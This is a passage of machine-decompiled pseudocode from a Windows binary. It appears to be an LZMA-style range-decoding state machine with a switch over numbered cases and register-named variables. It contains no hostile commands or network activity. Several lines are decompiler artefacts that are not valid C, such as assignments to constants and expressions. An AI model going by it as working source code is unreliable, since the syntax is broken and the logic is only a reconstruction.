                                                                  											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                                  											 *(_t612 - 0x84) = 6;
                                                                  											 *(_t612 - 0x4c) = _t553;
                                                                  											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                                  											goto L132;
                                                                  										case 3:
                                                                  											L21:
                                                                  											__eflags =  *(_t612 - 0x6c);
                                                                  											if( *(_t612 - 0x6c) == 0) {
                                                                  												 *(_t612 - 0x88) = 3;
                                                                  												goto L170;
                                                                  											}
                                                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                  											_t67 = _t612 - 0x70;
                                                                  											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                                  											__eflags =  *_t67;
                                                                  											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                  											L23:
                                                                  											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                                  											if( *(_t612 - 0x48) != 0) {
                                                                  												goto L21;
                                                                  											}
                                                                  											goto L24;
                                                                  										case 4:
                                                                  											L133:
                                                                  											_t531 =  *_t605;
                                                                  											_t588 = _t531 & 0x0000ffff;
                                                                  											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                                  											if( *(_t612 - 0xc) >= _t564) {
                                                                  												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                                  												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                                  												 *(_t612 - 0x40) = 1;
                                                                  												_t532 = _t531 - (_t531 >> 5);
                                                                  												__eflags = _t532;
                                                                  												 *_t605 = _t532;
                                                                  											} else {
                                                                  												 *(_t612 - 0x10) = _t564;
                                                                  												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                  												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                                  											}
                                                                  											if( *(_t612 - 0x10) >= 0x1000000) {
                                                                  												goto L139;
                                                                  											} else {
                                                                  												goto L137;
                                                                  											}
                                                                  										case 5:
                                                                  											L137:
                                                                  											if( *(_t612 - 0x6c) == 0) {
                                                                  												 *(_t612 - 0x88) = 5;
                                                                  												goto L170;
                                                                  											}
                                                                  											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                  											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                  											L139:
                                                                  											_t533 =  *(_t612 - 0x84);
                                                                  											goto L140;
                                                                  										case 6:
                                                                  											__edx = 0;
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												__eax =  *(__ebp - 4);
                                                                  												__ecx =  *(__ebp - 0x38);
                                                                  												 *(__ebp - 0x34) = 1;
                                                                  												 *(__ebp - 0x84) = 7;
                                                                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                  												goto L132;
                                                                  											}
                                                                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                  											__esi =  *(__ebp - 0x60);
                                                                  											__cl = 8;
                                                                  											__cl = 8 -  *(__ebp - 0x3c);
                                                                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                  											__ecx =  *(__ebp - 0x3c);
                                                                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                  											__ecx =  *(__ebp - 4);
                                                                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                  											__eflags =  *(__ebp - 0x38) - 4;
                                                                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                  											if( *(__ebp - 0x38) >= 4) {
                                                                  												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                  												if( *(__ebp - 0x38) >= 0xa) {
                                                                  													_t98 = __ebp - 0x38;
                                                                  													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                  													__eflags =  *_t98;
                                                                  												} else {
                                                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                  												}
                                                                  											} else {
                                                                  												 *(__ebp - 0x38) = 0;
                                                                  											}
                                                                  											__eflags =  *(__ebp - 0x34) - __edx;
                                                                  											if( *(__ebp - 0x34) == __edx) {
                                                                  												__ebx = 0;
                                                                  												__ebx = 1;
                                                                  												goto L61;
                                                                  											} else {
                                                                  												__eax =  *(__ebp - 0x14);
                                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                                  													__eflags = __eax;
                                                                  												}
                                                                  												__ecx =  *(__ebp - 8);
                                                                  												__ebx = 0;
                                                                  												__ebx = 1;
                                                                  												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                  												goto L41;
                                                                  											}
                                                                  										case 7:
                                                                  											__eflags =  *(__ebp - 0x40) - 1;
                                                                  											if( *(__ebp - 0x40) != 1) {
                                                                  												__eax =  *(__ebp - 0x24);
                                                                  												 *(__ebp - 0x80) = 0x16;
                                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                  												__eax =  *(__ebp - 0x28);
                                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                  												__eax =  *(__ebp - 0x2c);
                                                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                  												__eax = 0;
                                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                  												__al = __al & 0x000000fd;
                                                                  												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                  												__eax =  *(__ebp - 4);
                                                                  												__eax =  *(__ebp - 4) + 0x664;
                                                                  												__eflags = __eax;
                                                                  												 *(__ebp - 0x58) = __eax;
                                                                  												goto L69;
                                                                  											}
                                                                  											__eax =  *(__ebp - 4);
                                                                  											__ecx =  *(__ebp - 0x38);
                                                                  											 *(__ebp - 0x84) = 8;
                                                                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                  											goto L132;
                                                                  										case 8:
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												__eax =  *(__ebp - 4);
                                                                  												__ecx =  *(__ebp - 0x38);
                                                                  												 *(__ebp - 0x84) = 0xa;
                                                                  												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                  											} else {
                                                                  												__eax =  *(__ebp - 0x38);
                                                                  												__ecx =  *(__ebp - 4);
                                                                  												__eax =  *(__ebp - 0x38) + 0xf;
                                                                  												 *(__ebp - 0x84) = 9;
                                                                  												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                  												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                  											}
                                                                  											goto L132;
                                                                  										case 9:
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												goto L90;
                                                                  											}
                                                                  											__eflags =  *(__ebp - 0x60);
                                                                  											if( *(__ebp - 0x60) == 0) {
                                                                  												goto L171;
                                                                  											}
                                                                  											__eax = 0;
                                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                                  											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                  											__eflags = _t259;
                                                                  											0 | _t259 = _t259 + _t259 + 9;
                                                                  											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                  											goto L76;
                                                                  										case 0xa:
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												__eax =  *(__ebp - 4);
                                                                  												__ecx =  *(__ebp - 0x38);
                                                                  												 *(__ebp - 0x84) = 0xb;
                                                                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                  												goto L132;
                                                                  											}
                                                                  											__eax =  *(__ebp - 0x28);
                                                                  											goto L89;
                                                                  										case 0xb:
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												__ecx =  *(__ebp - 0x24);
                                                                  												__eax =  *(__ebp - 0x20);
                                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                  											} else {
                                                                  												__eax =  *(__ebp - 0x24);
                                                                  											}
                                                                  											__ecx =  *(__ebp - 0x28);
                                                                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                  											L89:
                                                                  											__ecx =  *(__ebp - 0x2c);
                                                                  											 *(__ebp - 0x2c) = __eax;
                                                                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                  											L90:
                                                                  											__eax =  *(__ebp - 4);
                                                                  											 *(__ebp - 0x80) = 0x15;
                                                                  											__eax =  *(__ebp - 4) + 0xa68;
                                                                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                  											goto L69;
                                                                  										case 0xc:
                                                                  											L100:
                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                  												 *(__ebp - 0x88) = 0xc;
                                                                  												goto L170;
                                                                  											}
                                                                  											__ecx =  *(__ebp - 0x70);
                                                                  											__eax =  *(__ebp - 0xc);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											_t335 = __ebp - 0x70;
                                                                  											 *_t335 =  *(__ebp - 0x70) + 1;
                                                                  											__eflags =  *_t335;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											__eax =  *(__ebp - 0x2c);
                                                                  											goto L102;
                                                                  										case 0xd:
                                                                  											L37:
                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                  												 *(__ebp - 0x88) = 0xd;
                                                                  												goto L170;
                                                                  											}
                                                                  											__ecx =  *(__ebp - 0x70);
                                                                  											__eax =  *(__ebp - 0xc);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											_t122 = __ebp - 0x70;
                                                                  											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                  											__eflags =  *_t122;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											L39:
                                                                  											__eax =  *(__ebp - 0x40);
                                                                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                  												goto L48;
                                                                  											}
                                                                  											__eflags = __ebx - 0x100;
                                                                  											if(__ebx >= 0x100) {
                                                                  												goto L54;
                                                                  											}
                                                                  											L41:
                                                                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                  											__ecx =  *(__ebp - 0x58);
                                                                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                  											 *(__ebp - 0x48) = __eax;
                                                                  											__eax = __eax + 1;
                                                                  											__eax = __eax << 8;
                                                                  											__eax = __eax + __ebx;
                                                                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                  											__ax =  *__esi;
                                                                  											 *(__ebp - 0x54) = __esi;
                                                                  											__edx = __ax & 0x0000ffff;
                                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  												__cx = __ax;
                                                                  												 *(__ebp - 0x40) = 1;
                                                                  												__cx = __ax >> 5;
                                                                  												__eflags = __eax;
                                                                  												__ebx = __ebx + __ebx + 1;
                                                                  												 *__esi = __ax;
                                                                  											} else {
                                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                  												 *(__ebp - 0x10) = __ecx;
                                                                  												0x800 = 0x800 - __edx;
                                                                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                  												__ebx = __ebx + __ebx;
                                                                  												 *__esi = __cx;
                                                                  											}
                                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  											 *(__ebp - 0x44) = __ebx;
                                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  												goto L39;
                                                                  											} else {
                                                                  												goto L37;
                                                                  											}
                                                                  										case 0xe:
                                                                  											L46:
                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                  												 *(__ebp - 0x88) = 0xe;
                                                                  												goto L170;
                                                                  											}
                                                                  											__ecx =  *(__ebp - 0x70);
                                                                  											__eax =  *(__ebp - 0xc);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											_t156 = __ebp - 0x70;
                                                                  											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                  											__eflags =  *_t156;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											while(1) {
                                                                  												L48:
                                                                  												__eflags = __ebx - 0x100;
                                                                  												if(__ebx >= 0x100) {
                                                                  													break;
                                                                  												}
                                                                  												__eax =  *(__ebp - 0x58);
                                                                  												__edx = __ebx + __ebx;
                                                                  												__ecx =  *(__ebp - 0x10);
                                                                  												__esi = __edx + __eax;
                                                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                  												__ax =  *__esi;
                                                                  												 *(__ebp - 0x54) = __esi;
                                                                  												__edi = __ax & 0x0000ffff;
                                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  													__cx = __ax;
                                                                  													_t170 = __edx + 1; // 0x1
                                                                  													__ebx = _t170;
                                                                  													__cx = __ax >> 5;
                                                                  													__eflags = __eax;
                                                                  													 *__esi = __ax;
                                                                  												} else {
                                                                  													 *(__ebp - 0x10) = __ecx;
                                                                  													0x800 = 0x800 - __edi;
                                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  													__ebx = __ebx + __ebx;
                                                                  													 *__esi = __cx;
                                                                  												}
                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  												 *(__ebp - 0x44) = __ebx;
                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  													continue;
                                                                  												} else {
                                                                  													goto L46;
                                                                  												}
                                                                  											}
                                                                  											L54:
                                                                  											_t173 = __ebp - 0x34;
                                                                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                  											__eflags =  *_t173;
                                                                  											goto L55;
                                                                  										case 0xf:
                                                                  											L58:
                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                  												 *(__ebp - 0x88) = 0xf;
                                                                  												goto L170;
                                                                  											}
                                                                  											__ecx =  *(__ebp - 0x70);
                                                                  											__eax =  *(__ebp - 0xc);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											_t203 = __ebp - 0x70;
                                                                  											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                  											__eflags =  *_t203;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											L60:
                                                                  											__eflags = __ebx - 0x100;
                                                                  											if(__ebx >= 0x100) {
                                                                  												L55:
                                                                  												__al =  *(__ebp - 0x44);
                                                                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                  												goto L56;
                                                                  											}
                                                                  											L61:
                                                                  											__eax =  *(__ebp - 0x58);
                                                                  											__edx = __ebx + __ebx;
                                                                  											__ecx =  *(__ebp - 0x10);
                                                                  											__esi = __edx + __eax;
                                                                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                  											__ax =  *__esi;
                                                                  											 *(__ebp - 0x54) = __esi;
                                                                  											__edi = __ax & 0x0000ffff;
                                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  												__cx = __ax;
                                                                  												_t217 = __edx + 1; // 0x1
                                                                  												__ebx = _t217;
                                                                  												__cx = __ax >> 5;
                                                                  												__eflags = __eax;
                                                                  												 *__esi = __ax;
                                                                  											} else {
                                                                  												 *(__ebp - 0x10) = __ecx;
                                                                  												0x800 = 0x800 - __edi;
                                                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  												__ebx = __ebx + __ebx;
                                                                  												 *__esi = __cx;
                                                                  											}
                                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  											 *(__ebp - 0x44) = __ebx;
                                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  												goto L60;
                                                                  											} else {
                                                                  												goto L58;
                                                                  											}
                                                                  										case 0x10:
                                                                  											L110:
                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                  												 *(__ebp - 0x88) = 0x10;
                                                                  												goto L170;
                                                                  											}
                                                                  											__ecx =  *(__ebp - 0x70);
                                                                  											__eax =  *(__ebp - 0xc);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											_t366 = __ebp - 0x70;
                                                                  											 *_t366 =  *(__ebp - 0x70) + 1;
                                                                  											__eflags =  *_t366;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											goto L112;
                                                                  										case 0x11:
                                                                  											L69:
                                                                  											__esi =  *(__ebp - 0x58);
                                                                  											 *(__ebp - 0x84) = 0x12;
                                                                  											L132:
                                                                  											 *(_t612 - 0x54) = _t605;
                                                                  											goto L133;
                                                                  										case 0x12:
                                                                  											goto L0;
                                                                  										case 0x13:
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												_t469 = __ebp - 0x58;
                                                                  												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                  												__eflags =  *_t469;
                                                                  												 *(__ebp - 0x30) = 0x10;
                                                                  												 *(__ebp - 0x40) = 8;
                                                                  												goto L144;
                                                                  											}
                                                                  											__eax =  *(__ebp - 0x4c);
                                                                  											__ecx =  *(__ebp - 0x58);
                                                                  											__eax =  *(__ebp - 0x4c) << 4;
                                                                  											 *(__ebp - 0x30) = 8;
                                                                  											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                  											goto L130;
                                                                  										case 0x14:
                                                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                  											__eax =  *(__ebp - 0x80);
                                                                  											L140:
                                                                  											 *(_t612 - 0x88) = _t533;
                                                                  											goto L1;
                                                                  										case 0x15:
                                                                  											__eax = 0;
                                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                                  											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                  											__al = __al & 0x000000fd;
                                                                  											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                  											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                  											goto L121;
                                                                  										case 0x16:
                                                                  											__eax =  *(__ebp - 0x30);
                                                                  											__eflags = __eax - 4;
                                                                  											if(__eax >= 4) {
                                                                  												_push(3);
                                                                  												_pop(__eax);
                                                                  											}
                                                                  											__ecx =  *(__ebp - 4);
                                                                  											 *(__ebp - 0x40) = 6;
                                                                  											__eax = __eax << 7;
                                                                  											 *(__ebp - 0x7c) = 0x19;
                                                                  											 *(__ebp - 0x58) = __eax;
                                                                  											goto L145;
                                                                  										case 0x17:
                                                                  											goto L145;
                                                                  										case 0x18:
                                                                  											L146:
                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                  												 *(__ebp - 0x88) = 0x18;
                                                                  												goto L170;
                                                                  											}
                                                                  											__ecx =  *(__ebp - 0x70);
                                                                  											__eax =  *(__ebp - 0xc);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											_t484 = __ebp - 0x70;
                                                                  											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                  											__eflags =  *_t484;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											L148:
                                                                  											_t487 = __ebp - 0x48;
                                                                  											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                  											__eflags =  *_t487;
                                                                  											goto L149;
                                                                  										case 0x19:
                                                                  											__eflags = __ebx - 4;
                                                                  											if(__ebx < 4) {
                                                                  												 *(__ebp - 0x2c) = __ebx;
                                                                  												L120:
                                                                  												_t394 = __ebp - 0x2c;
                                                                  												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                                  												__eflags =  *_t394;
                                                                  												L121:
                                                                  												__eax =  *(__ebp - 0x2c);
                                                                  												__eflags = __eax;
                                                                  												if(__eax == 0) {
                                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                  													goto L170;
                                                                  												}
                                                                  												__eflags = __eax -  *(__ebp - 0x60);
                                                                  												if(__eax >  *(__ebp - 0x60)) {
                                                                  													goto L171;
                                                                  												}
                                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                  												__eax =  *(__ebp - 0x30);
                                                                  												_t401 = __ebp - 0x60;
                                                                  												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                  												__eflags =  *_t401;
                                                                  												goto L124;
                                                                  											}
                                                                  											__ecx = __ebx;
                                                                  											__eax = __ebx;
                                                                  											__ecx = __ebx >> 1;
                                                                  											__eax = __ebx & 0x00000001;
                                                                  											__ecx = (__ebx >> 1) - 1;
                                                                  											__al = __al | 0x00000002;
                                                                  											__eax = (__ebx & 0x00000001) << __cl;
                                                                  											__eflags = __ebx - 0xe;
                                                                  											 *(__ebp - 0x2c) = __eax;
                                                                  											if(__ebx >= 0xe) {
                                                                  												__ebx = 0;
                                                                  												 *(__ebp - 0x48) = __ecx;
                                                                  												L103:
                                                                  												__eflags =  *(__ebp - 0x48);
                                                                  												if( *(__ebp - 0x48) <= 0) {
                                                                  													__eax = __eax + __ebx;
                                                                  													 *(__ebp - 0x40) = 4;
                                                                  													 *(__ebp - 0x2c) = __eax;
                                                                  													__eax =  *(__ebp - 4);
                                                                  													__eax =  *(__ebp - 4) + 0x644;
                                                                  													__eflags = __eax;
                                                                  													L109:
                                                                  													__ebx = 0;
                                                                  													 *(__ebp - 0x58) = __eax;
                                                                  													 *(__ebp - 0x50) = 1;
                                                                  													 *(__ebp - 0x44) = 0;
                                                                  													 *(__ebp - 0x48) = 0;
                                                                  													L113:
                                                                  													__eax =  *(__ebp - 0x40);
                                                                  													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                  													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                  														_t392 = __ebp - 0x2c;
                                                                  														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                                  														__eflags =  *_t392;
                                                                  														goto L120;
                                                                  													}
                                                                  													__eax =  *(__ebp - 0x50);
                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                  													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                  													__eax =  *(__ebp - 0x58);
                                                                  													__esi = __edi + __eax;
                                                                  													 *(__ebp - 0x54) = __esi;
                                                                  													__ax =  *__esi;
                                                                  													__ecx = __ax & 0x0000ffff;
                                                                  													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                  													__eflags =  *(__ebp - 0xc) - __edx;
                                                                  													if( *(__ebp - 0xc) >= __edx) {
                                                                  														__ecx = 0;
                                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                  														__ecx = 1;
                                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                  														__ebx = 1;
                                                                  														__ecx =  *(__ebp - 0x48);
                                                                  														__ebx = 1 << __cl;
                                                                  														__ecx = 1 << __cl;
                                                                  														__ebx =  *(__ebp - 0x44);
                                                                  														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                  														__cx = __ax;
                                                                  														__cx = __ax >> 5;
                                                                  														__eax = __eax - __ecx;
                                                                  														__edi = __edi + 1;
                                                                  														__eflags = __edi;
                                                                  														 *(__ebp - 0x44) = __ebx;
                                                                  														 *__esi = __ax;
                                                                  														 *(__ebp - 0x50) = __edi;
                                                                  													} else {
                                                                  														 *(__ebp - 0x10) = __edx;
                                                                  														0x800 = 0x800 - __ecx;
                                                                  														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                  														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                  														 *__esi = __dx;
                                                                  													}
                                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  														L112:
                                                                  														_t369 = __ebp - 0x48;
